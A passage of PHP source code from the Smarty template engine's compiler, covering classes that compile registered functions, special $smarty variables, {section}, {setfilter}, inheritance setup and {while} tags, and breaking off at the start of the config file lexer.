            $tag_info = $compiler->default_handler_plugins[ Smarty::PLUGIN_BLOCK ][ $tag ];
            $callback = $tag_info[ 0 ];
            if (is_array($callback)) {
                $callable = "array('{$callback[0]}', '{$callback[1]}')";
                $callback = "{$callback[1]}::{$callback[1]}";
            } else {
                $callable = null;
            }
        }
        $compiler->tag_nocache = !$tag_info[ 1 ] | $compiler->tag_nocache;
        $_paramsArray = array();
        foreach ($_attr as $_key => $_value) {
            if (is_int($_key)) {
                $_paramsArray[] = "$_key=>$_value";
            } elseif ($compiler->template->caching && in_array($_key, $tag_info[ 2 ])) {
                $_value = str_replace('\'', "^#^", $_value);
                $_paramsArray[] = "'$_key'=>^#^.var_export($_value,true).^#^";
            } else {
                $_paramsArray[] = "'$_key'=>$_value";
            }
        }
        return array($callback, $_paramsArray, $callable);
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Registered Function
 * Compiles code for the execution of a registered function
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Registered Function Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Private_Registered_Function extends Smarty_Internal_CompileBase
{
    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $optional_attributes = array('_any');

    /**
     * Compiles code for the execution of a registered function
     *
     * @param array                                 $args      array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler  compiler object
     * @param array                                 $parameter array with compilation parameter
     * @param string                                $tag       name of function
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     * @throws \SmartyException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler, $parameter, $tag)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        unset($_attr[ 'nocache' ]);
        if (isset($compiler->smarty->registered_plugins[ Smarty::PLUGIN_FUNCTION ][ $tag ])) {
            $tag_info = $compiler->smarty->registered_plugins[ Smarty::PLUGIN_FUNCTION ][ $tag ];
            $is_registered = true;
        } else {
            $tag_info = $compiler->default_handler_plugins[ Smarty::PLUGIN_FUNCTION ][ $tag ];
            $is_registered = false;
        }
        // not cacheable?
        $compiler->tag_nocache = $compiler->tag_nocache || !$tag_info[ 1 ];
        // convert attributes into parameter array string
        $_paramsArray = array();
        foreach ($_attr as $_key => $_value) {
            if (is_int($_key)) {
                $_paramsArray[] = "$_key=>$_value";
            } elseif ($compiler->template->caching && in_array($_key, $tag_info[ 2 ])) {
                $_value = str_replace('\'', "^#^", $_value);
                $_paramsArray[] = "'$_key'=>^#^.var_export($_value,true).^#^";
            } else {
                $_paramsArray[] = "'$_key'=>$_value";
            }
        }
        $_params = 'array(' . implode(',', $_paramsArray) . ')';
        // compile code
        if ($is_registered) {
            $output =
                "call_user_func_array( \$_smarty_tpl->smarty->registered_plugins[Smarty::PLUGIN_FUNCTION]['{$tag}'][0], array( {$_params},\$_smarty_tpl ) )";
        } else {
            $function = $tag_info[ 0 ];
            if (!is_array($function)) {
                $output = "{$function}({$_params},\$_smarty_tpl)";
            } else {
                $output = "{$function[0]}::{$function[1]}({$_params},\$_smarty_tpl)";
            }
        }
        if (!empty($parameter[ 'modifierlist' ])) {
            $output = $compiler->compileTag(
                'private_modifier',
                array(),
                array(
                    'modifierlist' => $parameter[ 'modifierlist' ],
                    'value'        => $output
                )
            );
        }
        $output = "<?php echo {$output};?>\n";
        return $output;
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Special Smarty Variable
 * Compiles the special $smarty variables
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile special Smarty Variable Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Private_Special_Variable extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for the special $smarty variables
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     * @param                                       $parameter
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler, $parameter)
    {
        $_index = preg_split("/\]\[/", substr($parameter, 1, strlen($parameter) - 2));
        $variable = smarty_strtolower_ascii($compiler->getId($_index[ 0 ]));
        if ($variable === false) {
            $compiler->trigger_template_error("special \$Smarty variable name index can not be variable", null, true);
        }
        if (!isset($compiler->smarty->security_policy)
            || $compiler->smarty->security_policy->isTrustedSpecialSmartyVar($variable, $compiler)
        ) {
            switch ($variable) {
                case 'foreach':
                case 'section':
                    if (!isset(Smarty_Internal_TemplateCompilerBase::$_tag_objects[ $variable ])) {
                        $class = 'Smarty_Internal_Compile_' . smarty_ucfirst_ascii($variable);
                        Smarty_Internal_TemplateCompilerBase::$_tag_objects[ $variable ] = new $class;
                    }
                    return Smarty_Internal_TemplateCompilerBase::$_tag_objects[ $variable ]->compileSpecialVariable(
                        array(),
                        $compiler,
                        $_index
                    );
                case 'capture':
                    if (class_exists('Smarty_Internal_Compile_Capture')) {
                        return Smarty_Internal_Compile_Capture::compileSpecialVariable(array(), $compiler, $_index);
                    }
                    return '';
                case 'now':
                    return 'time()';
                case 'cookies':
                    if (isset($compiler->smarty->security_policy)
                        && !$compiler->smarty->security_policy->allow_super_globals
                    ) {
                        $compiler->trigger_template_error("(secure mode) super globals not permitted");
                        break;
                    }
                    $compiled_ref = '$_COOKIE';
                    break;
                case 'get':
                case 'post':
                case 'env':
                case 'server':
                case 'session':
                case 'request':
                    if (isset($compiler->smarty->security_policy)
                        && !$compiler->smarty->security_policy->allow_super_globals
                    ) {
                        $compiler->trigger_template_error("(secure mode) super globals not permitted");
                        break;
                    }
                    $compiled_ref = '$_' . smarty_strtoupper_ascii($variable);
                    break;
                case 'template':
                    return 'basename($_smarty_tpl->source->filepath)';
                case 'template_object':
                    if (isset($compiler->smarty->security_policy)) {
                        $compiler->trigger_template_error("(secure mode) template_object not permitted");
                        break;
                    }
                    return '$_smarty_tpl';
                case 'current_dir':
                    return 'dirname($_smarty_tpl->source->filepath)';
                case 'version':
                    return "Smarty::SMARTY_VERSION";
                case 'const':
                    if (isset($compiler->smarty->security_policy)
                        && !$compiler->smarty->security_policy->allow_constants
                    ) {
                        $compiler->trigger_template_error("(secure mode) constants not permitted");
                        break;
                    }
                    if (strpos($_index[ 1 ], '$') === false && strpos($_index[ 1 ], '\'') === false) {
                        return "(defined('{$_index[1]}') ? constant('{$_index[1]}') : null)";
                    } else {
                        return "(defined({$_index[1]}) ? constant({$_index[1]}) : null)";
                    }
                // no break
                case 'config':
                    if (isset($_index[ 2 ])) {
                        return "(is_array(\$tmp = \$_smarty_tpl->smarty->ext->configload->_getConfigVariable(\$_smarty_tpl, $_index[1])) ? \$tmp[$_index[2]] : null)";
                    } else {
                        return "\$_smarty_tpl->smarty->ext->configload->_getConfigVariable(\$_smarty_tpl, $_index[1])";
                    }
                // no break
                case 'ldelim':
                    return "\$_smarty_tpl->smarty->left_delimiter";
                case 'rdelim':
                    return "\$_smarty_tpl->smarty->right_delimiter";
                default:
                    $compiler->trigger_template_error('$smarty.' . trim($_index[ 0 ], "'") . ' is not defined');
                    break;
            }
            if (isset($_index[ 1 ])) {
                array_shift($_index);
                foreach ($_index as $_ind) {
                    $compiled_ref = $compiled_ref . "[$_ind]";
                }
            }
            return $compiled_ref;
        }
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Rdelim
 * Compiles the {rdelim} tag
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Rdelim Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Rdelim extends Smarty_Internal_Compile_Ldelim
{
    /**
     * Compiles code for the {rdelim} tag
     * This tag does output the right delimiter.
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        parent::compile($args, $compiler);
        return $compiler->smarty->right_delimiter;
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Section
 * Compiles the {section} {sectionelse} {/section} tags
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Section Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Section extends Smarty_Internal_Compile_Private_ForeachSection
{
    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $required_attributes = array('name', 'loop');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $shorttag_order = array('name', 'loop');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $optional_attributes = array('start', 'step', 'max', 'show', 'properties');

    /**
     * counter
     *
     * @var int
     */
    public $counter = 0;

    /**
     * Name of this tag
     *
     * @var string
     */
    public $tagName = 'section';

    /**
     * Valid properties of $smarty.section.name.xxx variable
     *
     * @var array
     */
    public $nameProperties = array(
        'first', 'last', 'index', 'iteration', 'show', 'total', 'rownum', 'index_prev',
        'index_next', 'loop'
    );

    /**
     * {section} tag has no item properties
     *
     * @var array
     */
    public $itemProperties = null;

    /**
     * {section} tag has always name attribute
     *
     * @var bool
     */
    public $isNamed = true;

    /**
     * Compiles code for the {section} tag
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     * @throws \SmartyException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        $compiler->loopNesting++;
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        $attributes = array('name' => $compiler->getId($_attr[ 'name' ]));
        unset($_attr[ 'name' ]);
        foreach ($attributes as $a => $v) {
            if ($v === false) {
                $compiler->trigger_template_error("'{$a}' attribute/variable has illegal value", null, true);
            }
        }
        $local = "\$__section_{$attributes['name']}_" . $this->counter++ . '_';
        $sectionVar = "\$_smarty_tpl->tpl_vars['__smarty_section_{$attributes['name']}']";
        $this->openTag($compiler, 'section', array('section', $compiler->nocache, $local, $sectionVar));
        // maybe nocache because of nocache variables
        $compiler->nocache = $compiler->nocache | $compiler->tag_nocache;
        $initLocal = array();
        $initNamedProperty = array();
        $initFor = array();
        $incFor = array();
        $cmpFor = array();
        $propValue = array(
            'index'     => "{$sectionVar}->value['index']", 'show' => 'true', 'step' => 1,
            'iteration' => "{$local}iteration",
        );
        $propType = array('index' => 2, 'iteration' => 2, 'show' => 0, 'step' => 0,);
        // search for used tag attributes
        $this->scanForProperties($attributes, $compiler);
        if (!empty($this->matchResults[ 'named' ])) {
            $namedAttr = $this->matchResults[ 'named' ];
        }
        if (isset($_attr[ 'properties' ]) && preg_match_all("/['](.*?)[']/", $_attr[ 'properties' ], $match)) {
            foreach ($match[ 1 ] as $prop) {
                if (in_array($prop, $this->nameProperties)) {
                    $namedAttr[ $prop ] = true;
                } else {
                    $compiler->trigger_template_error("Invalid property '{$prop}'", null, true);
                }
            }
        }
        $namedAttr[ 'index' ] = true;
        $output = "<?php\n";
        foreach ($_attr as $attr_name => $attr_value) {
            switch ($attr_name) {
                case 'loop':
                    if (is_numeric($attr_value)) {
                        $v = (int)$attr_value;
                        $t = 0;
                    } else {
                        $v = "(is_array(@\$_loop=$attr_value) ? count(\$_loop) : max(0, (int) \$_loop))";
                        $t = 1;
                    }
                    if ($t === 1) {
                        $initLocal[ 'loop' ] = $v;
                        $v = "{$local}loop";
                    }
                    break;
                case 'show':
                    if (is_bool($attr_value)) {
                        $v = $attr_value ? 'true' : 'false';
                        $t = 0;
                    } else {
                        $v = "(bool) $attr_value";
                        $t = 3;
                    }
                    break;
                case 'step':
                    if (is_numeric($attr_value)) {
                        $v = (int)$attr_value;
                        $v = ($v === 0) ? 1 : $v;
                        $t = 0;
                        break;
                    }
                    $initLocal[ 'step' ] = "((int)@$attr_value) === 0 ? 1 : (int)@$attr_value";
                    $v = "{$local}step";
                    $t = 2;
                    break;
                case 'max':
                case 'start':
                    if (is_numeric($attr_value)) {
                        $v = (int)$attr_value;
                        $t = 0;
                        break;
                    }
                    $v = "(int)@$attr_value";
                    $t = 3;
                    break;
            }
            if ($t === 3 && $compiler->getId($attr_value)) {
                $t = 1;
            }
            $propValue[ $attr_name ] = $v;
            $propType[ $attr_name ] = $t;
        }
        if (isset($namedAttr[ 'step' ])) {
            $initNamedProperty[ 'step' ] = $propValue[ 'step' ];
        }
        if (isset($namedAttr[ 'iteration' ])) {
            $propValue[ 'iteration' ] = "{$sectionVar}->value['iteration']";
        }
        $incFor[ 'iteration' ] = "{$propValue['iteration']}++";
        $initFor[ 'iteration' ] = "{$propValue['iteration']} = 1";
        if ($propType[ 'step' ] === 0) {
            if ($propValue[ 'step' ] === 1) {
                $incFor[ 'index' ] = "{$sectionVar}->value['index']++";
            } elseif ($propValue[ 'step' ] > 1) {
                $incFor[ 'index' ] = "{$sectionVar}->value['index'] += {$propValue['step']}";
            } else {
                $incFor[ 'index' ] = "{$sectionVar}->value['index'] -= " . -$propValue[ 'step' ];
            }
        } else {
            $incFor[ 'index' ] = "{$sectionVar}->value['index'] += {$propValue['step']}";
        }
        if (!isset($propValue[ 'max' ])) {
            $propValue[ 'max' ] = $propValue[ 'loop' ];
            $propType[ 'max' ] = $propType[ 'loop' ];
        } elseif ($propType[ 'max' ] !== 0) {
            $propValue[ 'max' ] = "{$propValue['max']} < 0 ? {$propValue['loop']} : {$propValue['max']}";
            $propType[ 'max' ] = 1;
        } else {
            if ($propValue[ 'max' ] < 0) {
                $propValue[ 'max' ] = $propValue[ 'loop' ];
                $propType[ 'max' ] = $propType[ 'loop' ];
            }
        }
        if (!isset($propValue[ 'start' ])) {
            $start_code =
                array(1 => "{$propValue['step']} > 0 ? ", 2 => '0', 3 => ' : ', 4 => $propValue[ 'loop' ], 5 => ' - 1');
            if ($propType[ 'loop' ] === 0) {
                $start_code[ 5 ] = '';
                $start_code[ 4 ] = $propValue[ 'loop' ] - 1;
            }
            if ($propType[ 'step' ] === 0) {
                if ($propValue[ 'step' ] > 0) {
                    $start_code = array(1 => '0');
                    $propType[ 'start' ] = 0;
                } else {
                    $start_code[ 1 ] = $start_code[ 2 ] = $start_code[ 3 ] = '';
                    $propType[ 'start' ] = $propType[ 'loop' ];
                }
            } else {
                $propType[ 'start' ] = 1;
            }
            $propValue[ 'start' ] = join('', $start_code);
        } else {
            $start_code =
                array(
                    1  => "{$propValue['start']} < 0 ? ", 2 => 'max(', 3 => "{$propValue['step']} > 0 ? ", 4 => '0',
                    5  => ' : ', 6 => '-1', 7 => ', ', 8 => "{$propValue['start']} + {$propValue['loop']}", 10 => ')',
                    11 => ' : ', 12 => 'min(', 13 => $propValue[ 'start' ], 14 => ', ',
                    15 => "{$propValue['step']} > 0 ? ", 16 => $propValue[ 'loop' ], 17 => ' : ',
                    18 => $propType[ 'loop' ] === 0 ? $propValue[ 'loop' ] - 1 : "{$propValue['loop']} - 1",
                    19 => ')'
                );
            if ($propType[ 'step' ] === 0) {
                $start_code[ 3 ] = $start_code[ 5 ] = $start_code[ 15 ] = $start_code[ 17 ] = '';
                if ($propValue[ 'step' ] > 0) {
                    $start_code[ 6 ] = $start_code[ 18 ] = '';
                } else {
                    $start_code[ 4 ] = $start_code[ 16 ] = '';
                }
            }
            if ($propType[ 'start' ] === 0) {
                if ($propType[ 'loop' ] === 0) {
                    $start_code[ 8 ] = $propValue[ 'start' ] + $propValue[ 'loop' ];
                }
                $propType[ 'start' ] = $propType[ 'step' ] + $propType[ 'loop' ];
                $start_code[ 1 ] = '';
                if ($propValue[ 'start' ] < 0) {
                    for ($i = 11; $i <= 19; $i++) {
                        $start_code[ $i ] = '';
                    }
                    if ($propType[ 'start' ] === 0) {
                        $start_code = array(
                            max(
                                $propValue[ 'step' ] > 0 ? 0 : -1,
                                $propValue[ 'start' ] + $propValue[ 'loop' ]
                            )
                        );
                    }
                } else {
                    for ($i = 1; $i <= 11; $i++) {
                        $start_code[ $i ] = '';
                    }
                    if ($propType[ 'start' ] === 0) {
                        $start_code =
                            array(
                                min(
                                    $propValue[ 'step' ] > 0 ? $propValue[ 'loop' ] : $propValue[ 'loop' ] - 1,
                                    $propValue[ 'start' ]
                                )
                            );
                    }
                }
            }
            $propValue[ 'start' ] = join('', $start_code);
        }
        if ($propType[ 'start' ] !== 0) {
            $initLocal[ 'start' ] = $propValue[ 'start' ];
            $propValue[ 'start' ] = "{$local}start";
        }
        $initFor[ 'index' ] = "{$sectionVar}->value['index'] = {$propValue['start']}";
        if (!isset($_attr[ 'start' ]) && !isset($_attr[ 'step' ]) && !isset($_attr[ 'max' ])) {
            $propValue[ 'total' ] = $propValue[ 'loop' ];
            $propType[ 'total' ] = $propType[ 'loop' ];
        } else {
            $propType[ 'total' ] =
                $propType[ 'start' ] + $propType[ 'loop' ] + $propType[ 'step' ] + $propType[ 'max' ];
            if ($propType[ 'total' ] === 0) {
                $propValue[ 'total' ] =
                    min(
                        ceil(
                            ($propValue[ 'step' ] > 0 ? $propValue[ 'loop' ] - $propValue[ 'start' ] :
                                (int)$propValue[ 'start' ] + 1) / abs($propValue[ 'step' ])
                        ),
                        $propValue[ 'max' ]
                    );
            } else {
                $total_code = array(
                    1  => 'min(', 2 => 'ceil(', 3 => '(', 4 => "{$propValue['step']} > 0 ? ",
                    5  => $propValue[ 'loop' ], 6 => ' - ', 7 => $propValue[ 'start' ], 8 => ' : ',
                    9  => $propValue[ 'start' ], 10 => '+ 1', 11 => ')', 12 => '/ ', 13 => 'abs(',
                    14 => $propValue[ 'step' ], 15 => ')', 16 => ')', 17 => ", {$propValue['max']})",
                );
                if (!isset($propValue[ 'max' ])) {
                    $total_code[ 1 ] = $total_code[ 17 ] = '';
                }
                if ($propType[ 'loop' ] + $propType[ 'start' ] === 0) {
                    $total_code[ 5 ] = $propValue[ 'loop' ] - $propValue[ 'start' ];
                    $total_code[ 6 ] = $total_code[ 7 ] = '';
                }
                if ($propType[ 'start' ] === 0) {
                    $total_code[ 9 ] = (int)$propValue[ 'start' ] + 1;
                    $total_code[ 10 ] = '';
                }
                if ($propType[ 'step' ] === 0) {
                    $total_code[ 13 ] = $total_code[ 15 ] = '';
                    if ($propValue[ 'step' ] === 1 || $propValue[ 'step' ] === -1) {
                        $total_code[ 2 ] = $total_code[ 12 ] = $total_code[ 14 ] = $total_code[ 16 ] = '';
                    } elseif ($propValue[ 'step' ] < 0) {
                        $total_code[ 14 ] = -$propValue[ 'step' ];
                    }
                    $total_code[ 4 ] = '';
                    if ($propValue[ 'step' ] > 0) {
                        $total_code[ 8 ] = $total_code[ 9 ] = $total_code[ 10 ] = '';
                    } else {
                        $total_code[ 5 ] = $total_code[ 6 ] = $total_code[ 7 ] = $total_code[ 8 ] = '';
                    }
                }
                $propValue[ 'total' ] = join('', $total_code);
            }
        }
        if (isset($namedAttr[ 'loop' ])) {
            $initNamedProperty[ 'loop' ] = "'loop' => {$propValue['loop']}";
        }
        if (isset($namedAttr[ 'total' ])) {
            $initNamedProperty[ 'total' ] = "'total' => {$propValue['total']}";
            if ($propType[ 'total' ] > 0) {
                $propValue[ 'total' ] = "{$sectionVar}->value['total']";
            }
        } elseif ($propType[ 'total' ] > 0) {
            $initLocal[ 'total' ] = $propValue[ 'total' ];
            $propValue[ 'total' ] = "{$local}total";
        }
        $cmpFor[ 'iteration' ] = "{$propValue['iteration']} <= {$propValue['total']}";
        foreach ($initLocal as $key => $code) {
            $output .= "{$local}{$key} = {$code};\n";
        }
        $_vars = 'array(' . join(', ', $initNamedProperty) . ')';
        $output .= "{$sectionVar} = new Smarty_Variable({$_vars});\n";
        $cond_code = "{$propValue['total']} !== 0";
        if ($propType[ 'total' ] === 0) {
            if ($propValue[ 'total' ] === 0) {
                $cond_code = 'false';
            } else {
                $cond_code = 'true';
            }
        }
        if ($propType[ 'show' ] > 0) {
            $output .= "{$local}show = {$propValue['show']} ? {$cond_code} : false;\n";
            $output .= "if ({$local}show) {\n";
        } elseif ($propValue[ 'show' ] === 'true') {
            $output .= "if ({$cond_code}) {\n";
        } else {
            $output .= "if (false) {\n";
        }
        $jinit = join(', ', $initFor);
        $jcmp = join(', ', $cmpFor);
        $jinc = join(', ', $incFor);
        $output .= "for ({$jinit}; {$jcmp}; {$jinc}){\n";
        if (isset($namedAttr[ 'rownum' ])) {
            $output .= "{$sectionVar}->value['rownum'] = {$propValue['iteration']};\n";
        }
        if (isset($namedAttr[ 'index_prev' ])) {
            $output .= "{$sectionVar}->value['index_prev'] = {$propValue['index']} - {$propValue['step']};\n";
        }
        if (isset($namedAttr[ 'index_next' ])) {
            $output .= "{$sectionVar}->value['index_next'] = {$propValue['index']} + {$propValue['step']};\n";
        }
        if (isset($namedAttr[ 'first' ])) {
            $output .= "{$sectionVar}->value['first'] = ({$propValue['iteration']} === 1);\n";
        }
        if (isset($namedAttr[ 'last' ])) {
            $output .= "{$sectionVar}->value['last'] = ({$propValue['iteration']} === {$propValue['total']});\n";
        }
        $output .= '?>';
        return $output;
    }
}

/**
 * Smarty Internal Plugin Compile Sectionelse Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Sectionelse extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for the {sectionelse} tag
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return string compiled code
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        list($openTag, $nocache, $local, $sectionVar) = $this->closeTag($compiler, array('section'));
        $this->openTag($compiler, 'sectionelse', array('sectionelse', $nocache, $local, $sectionVar));
        return "<?php }} else {\n ?>";
    }
}

/**
 * Smarty Internal Plugin Compile Sectionclose Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Sectionclose extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for the {/section} tag
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return string compiled code
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        $compiler->loopNesting--;
        // must endblock be nocache?
        if ($compiler->nocache) {
            $compiler->tag_nocache = true;
        }
        list($openTag, $compiler->nocache, $local, $sectionVar) =
            $this->closeTag($compiler, array('section', 'sectionelse'));
        $output = "<?php\n";
        if ($openTag === 'sectionelse') {
            $output .= "}\n";
        } else {
            $output .= "}\n}\n";
        }
        $output .= '?>';
        return $output;
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Setfilter
 * Compiles code for setfilter tag
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Setfilter Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Setfilter extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for setfilter tag
     *
     * @param array                                 $args      array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler  compiler object
     * @param array                                 $parameter array with compilation parameter
     *
     * @return string compiled code
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler, $parameter)
    {
        $compiler->variable_filter_stack[] = $compiler->variable_filters;
        $compiler->variable_filters = $parameter[ 'modifier_list' ];
        // this tag does not return compiled code
        $compiler->has_code = false;
        return true;
    }
}

/**
 * Smarty Internal Plugin Compile Setfilterclose Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Setfilterclose extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for the {/setfilter} tag
     * This tag does not generate compiled output. It resets variable filter.
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return string compiled code
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        $_attr = $this->getAttributes($compiler, $args);
        // reset variable filter to previous state
        if (count($compiler->variable_filter_stack)) {
            $compiler->variable_filters = array_pop($compiler->variable_filter_stack);
        } else {
            $compiler->variable_filters = array();
        }
        // this tag does not return compiled code
        $compiler->has_code = false;
        return true;
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Shared Inheritance
 * Shared methods for {extends} and {block} tags
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Shared Inheritance Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Shared_Inheritance extends Smarty_Internal_CompileBase
{
    /**
     * Compile inheritance initialization code as prefix
     *
     * @param \Smarty_Internal_TemplateCompilerBase $compiler
     * @param bool|false                            $initChildSequence if true force child template
     */
    public static function postCompile(Smarty_Internal_TemplateCompilerBase $compiler, $initChildSequence = false)
    {
        $compiler->prefixCompiledCode .= "<?php \$_smarty_tpl->_loadInheritance();\n\$_smarty_tpl->inheritance->init(\$_smarty_tpl, " .
                                         var_export($initChildSequence, true) . ");\n?>\n";
    }

    /**
     * Register post compile callback to compile inheritance initialization code
     *
     * @param \Smarty_Internal_TemplateCompilerBase $compiler
     * @param bool|false                            $initChildSequence if true force child template
     */
    public function registerInit(Smarty_Internal_TemplateCompilerBase $compiler, $initChildSequence = false)
    {
        if ($initChildSequence || !isset($compiler->_cache[ 'inheritanceInit' ])) {
            $compiler->registerPostCompileCallback(
                array('Smarty_Internal_Compile_Shared_Inheritance', 'postCompile'),
                array($initChildSequence),
                'inheritanceInit',
                $initChildSequence
            );
            $compiler->_cache[ 'inheritanceInit' ] = true;
        }
    }
}
<?php
/**
 * Smarty Internal Plugin Compile While
 * Compiles the {while} tag
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile While Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_While extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for the {while} tag
     *
     * @param array                                 $args      array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler  compiler object
     * @param array                                 $parameter array with compilation parameter
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler, $parameter)
    {
        $compiler->loopNesting++;
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        $this->openTag($compiler, 'while', $compiler->nocache);
        if (!array_key_exists('if condition', $parameter)) {
            $compiler->trigger_template_error('missing while condition', null, true);
        }
        // maybe nocache because of nocache variables
        $compiler->nocache = $compiler->nocache | $compiler->tag_nocache;
        if (is_array($parameter[ 'if condition' ])) {
            if ($compiler->nocache) {
                // create nocache var to make it know for further compiling
                if (is_array($parameter[ 'if condition' ][ 'var' ])) {
                    $var = $parameter[ 'if condition' ][ 'var' ][ 'var' ];
                } else {
                    $var = $parameter[ 'if condition' ][ 'var' ];
                }
                $compiler->setNocacheInVariable($var);
            }
            $prefixVar = $compiler->getNewPrefixVariable();
            $assignCompiler = new Smarty_Internal_Compile_Assign();
            $assignAttr = array();
            $assignAttr[][ 'value' ] = $prefixVar;
            if (is_array($parameter[ 'if condition' ][ 'var' ])) {
                $assignAttr[][ 'var' ] = $parameter[ 'if condition' ][ 'var' ][ 'var' ];
                $_output = "<?php while ({$prefixVar} = {$parameter[ 'if condition' ][ 'value' ]}) {?>";
                $_output .= $assignCompiler->compile(
                    $assignAttr,
                    $compiler,
                    array('smarty_internal_index' => $parameter[ 'if condition' ][ 'var' ][ 'smarty_internal_index' ])
                );
            } else {
                $assignAttr[][ 'var' ] = $parameter[ 'if condition' ][ 'var' ];
                $_output = "<?php while ({$prefixVar} = {$parameter[ 'if condition' ][ 'value' ]}) {?>";
                $_output .= $assignCompiler->compile($assignAttr, $compiler, array());
            }
            return $_output;
        } else {
            return "<?php\n while ({$parameter['if condition']}) {?>";
        }
    }
}

/**
 * Smarty Internal Plugin Compile Whileclose Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Whileclose extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for the {/while} tag
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return string compiled code
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        $compiler->loopNesting--;
        // must endblock be nocache?
        if ($compiler->nocache) {
            $compiler->tag_nocache = true;
        }
        $compiler->nocache = $this->closeTag($compiler, array('while'));
        return "<?php }?>\n";
    }
}
<?php
/**
 * Smarty Internal Plugin Configfilelexer
 *
 * This is the lexer to break the config file source into tokens
 *
 * @package    Smarty
 * @subpackage Config
 * @author     Uwe Tews
 */

/**
 * Smarty_Internal_Configfilelexer
 *
 * This is the config file lexer.
 * It is generated from the smarty_internal_configfilelexer.plex file
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */
class Smarty_Internal_Configfilelexer
{
    const START              = 1;
    const VALUE              = 2;
    const NAKED_STRING_VALUE = 3;
    const COMMENT            = 4;
    const SECTION            = 5;
    const TRIPPLE            = 6;

    /**
     * Source
     *
     * @var string
     */
    public $data;

    /**
     * Source length
     *
     * @var int
     */
    public $dataLength = null;

    /**
     * byte counter
     *
     * @var int
     */
    public $counter;

    /**
     * token number
     *
     * @var int
     */
    public $token;

    /**
     * token value
     *
     * @var string
     */
